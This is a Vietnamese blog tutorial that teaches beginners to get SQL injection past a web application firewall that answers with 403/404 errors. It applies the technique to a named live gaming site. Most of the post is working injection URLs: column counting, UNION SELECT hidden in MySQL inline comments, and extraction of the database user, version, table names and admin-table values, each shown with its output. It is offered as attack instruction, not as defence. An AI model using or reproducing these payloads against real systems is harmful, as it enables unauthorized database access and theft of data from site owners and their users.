Thứ Sáu, 22 tháng 6, 2012

[TUT] Bypass 404 SQL for Newbie

Vừa rồi làm by pass dạng 406 nên giờ làm tiếp tut by pass dạng 404 cho newbie học hỏi cách by pass.
Anh em biết rồi đừng chém nhé.

Site:

-->lỗi
+ Order by:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=67' order by 19-- -
-->lỗi
+
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=67' order by 18-- -
--> Bình thường.
+ Union:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -
-->
403 Forbidden

You don't have permission to access /news/67/gsl-final-preview&q=games.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+ By pass:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' UNION /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -
-->5,13,15,18.
+ Xem version:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' UNION /*!SELECT*/ 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18-- -
-->check6_brad@localhost : check6_checker : 5.1.56
+ Get table::
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' /*!UNION /*!SeLeCT*/ 1,2,3,4,concat_ws(0x7c,table_name),6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()-- -
-->
Forbidden

You don't have permission to access /news/67/gsl-final-preview&q=games.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+ Tiếp tục by pass:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' /*!UNION /*!SeLeCT*/ 1,2,3,4,concat_ws(0x7c,table_name),6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema./*!tables*/ where table_schema=database()-- -
-->aa_admin_level_values
+ Get colums:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' /*!UNION /*!SeLeCT*/ 1,2,3,4,concat_ws(0x7c,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema./*!columns*/ where table_name=0x61615f61646d696e5f6c6576656c5f76616c756573-- -
-->level_id
+ Get level_id:
Code:
http://check6gaming.com/news/67/gsl-final-preview&q=games.php?id=-67' /*!UNION /*!SeLeCT*/ 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x7c,level_id),14,15,16,17,18 from aa_admin_level_values-- -
-->2
Site này kỳ quá.
Chủ yếu là newbie biết kỹ thuật by pass dạng 404 .

Không có nhận xét nào: